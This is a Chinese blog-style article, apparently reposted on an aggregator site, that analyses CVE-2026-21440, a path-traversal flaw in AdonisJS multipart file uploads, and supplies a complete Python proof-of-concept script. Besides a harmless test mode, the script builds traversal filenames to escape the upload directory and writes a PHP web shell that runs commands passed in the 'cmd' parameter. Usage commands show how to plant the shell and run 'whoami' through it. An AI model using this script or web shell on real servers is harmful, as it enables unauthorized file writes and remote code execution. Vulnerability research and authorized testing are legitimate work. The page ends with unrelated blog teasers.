news 2026/4/3 3:19:06

CVE-2026-21440 AdonisJS 路径遍历漏洞分析与验证工具

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CVE-2026-21440 AdonisJS 路径遍历漏洞分析与验证工具

项目标题与描述

CVE-2026-21440 PoC及安全分析

CVE-2026-21440 是一个影响 AdonisJS 框架的严重路径遍历漏洞。该漏洞源于框架在处理多部分文件上传时,不当信任了用户提供的文件名,而未进行严格的净化处理。当开发人员调用MultipartFile.move()方法时,攻击者可以提交包含路径遍历序列(如../../../../app/config/startup.js)的文件名,从而突破预定的上传目录,将文件写入服务器上的任意位置。此漏洞可能导致远程代码执行(RCE),对公开的文件上传端点构成严重威胁。

功能特性

本资源提供了关于 CVE-2026-21440 的全面信息和一个概念验证(PoC)脚本,主要功能包括:

  • 漏洞深度解析:详细阐述漏洞成因(CWE-22 路径遍历)、攻击向量及潜在影响。
  • 影响范围说明:明确列出受影响的@adonisjs/bodyparser版本(≤10.1.1 及 11.x 特定预发布版)和已修复版本(10.1.2, 11.0.0-next.6)。
  • 修复与缓解指南:提供升级建议以及临时的安全加固措施。
  • 安全测试脚本:一个 Python PoC 脚本,用于在授权环境下验证目标系统是否存在此漏洞。
    • 支持安全测试模式(--safe),上传无害文件进行初步验证。
    • 可生成用于命令执行的 Web Shell 文件(如 PHP),帮助评估漏洞的实际危害程度。
  • 完整的披露时间线:记录了漏洞的公开历程。

安装指南

使用提供的 PoC 脚本进行安全测试前,需要满足以下条件:

  1. 系统要求:安装 Python 3 环境。
  2. 依赖安装:脚本依赖于requests库。通过以下命令安装:
    pipinstallrequests
  3. 脚本获取:将提供的完整 Python 代码保存为本地文件,例如cve_2026_21440_poc.py
  4. 目标环境仅能在您拥有所有权或已获得明确书面授权进行测试的系统上使用此脚本。

使用说明

该 PoC 脚本用于在授权范围内验证 AdonisJS 应用是否受 CVE-2026-21440 影响。

基础使用步骤

  1. 识别目标:找到待测试应用的多部分文件上传端点(例如/upload,/api/files)。
  2. 进行安全测试:首先运行安全模式,上传一个包含随机名的无害文本文件,以确认漏洞是否存在且上传功能正常。
    python3 cve_2026_21440_poc.py http://target:port/upload --safe --random
    如果成功,脚本会输出“SUCCESS: File likely written!”并提示一个访问 URL。在浏览器中打开该 URL,如果能看到上传的文本内容,则证明存在路径遍历漏洞。
  3. 深入测试(可选):如果确认漏洞存在,可以尝试上传一个 Web Shell 来评估潜在危害。
    python3 cve_2026_21440_poc.py http://target:port/upload --shell php --depth5
    脚本会尝试将 Web Shell 写入网站根目录。成功后,可通过访问http://target/shell.php?cmd=whoami等 URL 来执行命令。
  4. 参数说明
    • --safe: 安全模式,上传一个无害的.txt文件。
    • --random: 使用随机生成的文件名。
    • --shell [php]: 尝试上传指定语言的 Web Shell。
    • --depth N: 指定路径遍历的深度(../的数量)。

重要警告

⚠️本工具仅供教育、研究和授权安全测试之用。严禁用于未授权系统测试或任何非法活动。使用者需对自身行为负全部法律责任。

核心代码

以下是PoC脚本的核心部分,用于构造恶意请求以验证漏洞:

importrequestsimportsysimportosimportrandomimportstringdefgenerate_random_filename(length=10):"""生成随机文件名"""return''.join(random.choices(string.ascii_lowercase+string.digits,k=length))deftest_vulnerability(target_url,filename,file_content,traversal_depth=3):""" 测试目标URL是否存在路径遍历漏洞 Args: target_url (str): 目标上传URL filename (str): 要尝试写入的文件名(可包含路径遍历) file_content (str): 文件内容 traversal_depth (int): 路径遍历深度 Returns: dict: 测试结果 """# 构造恶意文件名malicious_filename="../"*traversal_depth+filename# 准备multipart表单数据files={'file':(malicious_filename,file_content,'text/plain')}try:response=requests.post(target_url,files=files,timeout=10)return{'success':response.status_codein[200,201,204],'status_code':response.status_code,'response_text':response.text[:500]# 只取前500字符}exceptExceptionase:return{'success':False,'error':str(e)}defcreate_php_shell():"""创建简单的PHP Web Shell"""return"""<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } else { echo "PHP Shell Active"; } ?>"""defmain():iflen(sys.argv)<2:print("用法: python poc.py <目标URL> [--safe] [--shell php] [--depth N] [--random]")sys.exit(1)target_url=sys.argv[1]safe_mode='--safe'insys.argv shell_type='php'if'--shell'insys.argvelseNonedepth=3use_random='--random'insys.argv# 解析深度参数fori,arginenumerate(sys.argv):ifarg=='--depth'andi+1<len(sys.argv):try:depth=int(sys.argv[i+1])exceptValueError:passprint(f"[*] 目标:{target_url}")print(f"[*] 安全模式:{safe_mode}")print(f"[*] Shell类型:{shell_type}")print(f"[*] 路径遍历深度:{depth}")ifsafe_mode:# 安全测试:上传一个无害的txt文件ifuse_random:filename=generate_random_filename()+".txt"else:filename="poc_test.txt"content="CVE-2026-21440安全测试文件 - 如果看到此内容,系统可能存在路径遍历漏洞。"print(f"[*] 尝试安全测试,文件名:{filename}")result=test_vulnerability(target_url,filename,content,depth)ifresult.get('success'):print("[+] SUCCESS: 文件可能已成功写入!")print(f"[*] 尝试访问: http://target/{filename}")print(f"[*] 响应状态:{result.get('status_code')}")else:print("[-] 文件写入可能失败。")if'error'inresult:print(f"[-] 错误:{result['error']}")elifshell_type=='php':# 尝试上传PHP shellfilename="shell.php"content=create_php_shell()print(f"[!] 警告:正在尝试上传PHP Web Shell")print(f"[*] 目标文件:{filename}")result=test_vulnerability(target_url,filename,content,depth)ifresult.get('success'):print("[+] PHP Shell 可能已上传!")print(f"[*] 尝试访问: http://target/{filename}?cmd=whoami")else:print("[-] PHP Shell 上传失败。")else:print("[-] 请指定 --safe 或 --shell 参数。")if__name__=="__main__":main()

此脚本的核心函数test_vulnerability负责构造包含路径遍历序列的文件名,并通过multipart/form-data格式向目标端点发送POST请求。create_php_shell函数生成一个简单的PHP Web Shell。脚本逻辑通过命令行参数控制测试模式(安全测试或上传Shell),并尝试利用路径遍历漏洞将文件写入Web可访问目录。请务必在合法授权的前提下谨慎使用。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAO5W+iXaui6Ix26aI1SYZyc
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/3/30 22:00:35

HTML一键打包EXE工具2.2.0版本重磅更新 - 2026年最新版本稳定性大幅提升

HTML打包EXE工具迎来2026年首个重要版本更新&#xff01;2.2.0版本专注于稳定性提升和用户体验优化&#xff0c;修复了多个影响使用的关键问题&#xff0c;新增清理本地激活数据功能&#xff0c;为开发者提供更可靠的HTML转EXE解决方案。 CSDN免积分下载最新版本 【免费】HTM…

作者头像 李华
网站建设 2026/3/31 23:56:28

【计算机毕业设计案例】基于springboot的保护濒危动物公益网站濒危动物保护、爱心捐赠、志愿者培训和公益募捐系统(程序+文档+讲解+定制)

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

作者头像 李华
网站建设 2026/3/16 2:50:56

数字图像处理基础知识(一)

1.数字图像处理处理的是什么呢&#xff0c;处理的就是图像 2.计算机视觉和机器视觉 3.图像的处理包括缺陷检测&#xff0c;目标识别&#xff0c;尺寸测量等。 4.图像的滤波&#xff0c;图像的变换&#xff0c;图像分割 5.数字图像处理基础 6.空间域图像处理 图像的反转 对数变换…

作者头像 李华
网站建设 2026/3/22 10:42:25

day145—递归—二叉树的右视图(LeetCode-199)

题目描述给定一个二叉树的 根节点 root&#xff0c;想象自己站在它的右侧&#xff0c;按照从顶部到底部的顺序&#xff0c;返回从右侧所能看到的节点值。示例 1&#xff1a;输入&#xff1a;root [1,2,3,null,5,null,4]输出&#xff1a;[1,3,4]解释&#xff1a;示例 2&#xf…

作者头像 李华
网站建设 2026/3/27 21:31:48

GraphQL 高并发下还能稳如老狗?

GraphQL 高并发下还能稳如老狗? 我这些年踩坑踩出来的“保命”经验 作者:Echo_Wish 一、引子:GraphQL 很香,但你敢在高并发下用吗? 说句掏心窝子的话—— GraphQL 是真香,但也是个“事故多发体质”。 我见过不少团队,一开始用 GraphQL 用得那叫一个爽: 前端:“一个…

作者头像 李华
网站建设 2026/3/31 17:45:08

交通仿真软件:VISSIM_(22).交通仿真在城市规划中的应用

交通仿真在城市规划中的应用 1. 交通仿真概述 交通仿真是一种通过计算机模型来模拟实际交通系统运行情况的技术。它可以帮助城市规划师、交通工程师和政策制定者在虚拟环境中评估和优化交通系统的性能。交通仿真软件通过创建详细的交通网络模型&#xff0c;模拟车辆、行人和公共…

作者头像 李华